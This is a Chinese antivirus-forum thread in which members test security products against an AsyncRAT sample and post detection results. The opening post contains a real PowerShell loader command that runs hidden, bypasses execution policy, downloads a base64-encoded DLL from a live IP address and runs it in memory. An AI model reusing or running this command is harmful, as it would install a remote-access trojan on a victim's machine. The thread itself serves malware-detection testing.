查看: 1467|回复: 10
收起左侧

[病毒样本] #AsyncRAT

[复制链接]
swizzer
发表于 2022-2-10 00:23:47 | 显示全部楼层 |阅读模式
本帖最后由 swizzer 于 2022-2-10 00:27 编辑
  1. powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/CRYPS/F3dll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('war/se347jkGsUONhMT0BGQj91/p/gro.eitsap//:ptth'))"
复制代码


得到的文件经过Base64 解码后:






解码后得到的总觉得是个损坏的dll···[/s[


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aboringman
发表于 2022-2-10 01:27:19 | 显示全部楼层
本帖最后由 aboringman 于 2022-2-10 03:43 编辑

执行

  1. 文件名: ISB.Downloader!gen285
  2. 完整路径: 不可用

  3. ____________________________

  4. ____________________________


  5. 在电脑上
  6. 不可用

  7. 上次使用时间
  8. 2022/2/10 ( 2:15:24 )

  9. 启动项


  10. 已启动


  11. 威胁类型: 启发式病毒。 根据恶意软件启发式技术检测威胁。

  12. ____________________________


  13. ISB.Downloader!gen285
  14. 定位


  15. 未知
  16. Norton 社区中使用了此文件的用户数未知 。

  17. 未知
  18. 此文件版本当前 未知。


  19. 此文件具有高风险。


  20. ____________________________


  21. 来源: 外部介质


  22. ____________________________

  23. 文件操作

  24. 文件: powershell.exe (ISB.Downloader!gen285) 未尝试修复
  25. ____________________________


  26. 文件指纹 - SHA:
  27. 不可用
  28. 文件指纹 - MD5:
  29. 不可用
复制代码


McAfee:网络保护出手拦截下载。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ft-cai
发表于 2022-2-10 08:09:53 | 显示全部楼层
Kaspersky


昨天的库就杀了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
病毒样本收集者
发表于 2022-2-10 14:37:51 | 显示全部楼层
MDE扫描miss
火绒的粉丝
发表于 2022-2-10 14:42:15 | 显示全部楼层
火绒:miss
心心相印
发表于 2022-2-10 14:53:11 | 显示全部楼层
fs miss
846472713
发表于 2022-2-10 22:00:33 | 显示全部楼层
G DATA

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ANY.LNK
发表于 2022-2-11 08:34:30 | 显示全部楼层
MS Defender:目前暂时都没有报告。@swizzer 你不会直接把解码后的内容粘贴到一个文本文档里了吧,那样是不行的呀
ft-cai
发表于 2022-2-11 08:37:05 | 显示全部楼层
小A

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
swizzer
 楼主| 发表于 2022-2-11 09:09:57 | 显示全部楼层
ANY.LNK 发表于 2022-2-11 08:34
MS Defender:目前暂时都没有报告。@swizzer 你不会直接把解码后的内容粘贴到一个文本文档里了吧,那样是不 ...

确实是···因为我不知道怎么把它修复成正常的PE文件

所以这里主要测试的是那个Powershell命令
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-5 23:06 , Processed in 0.120289 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表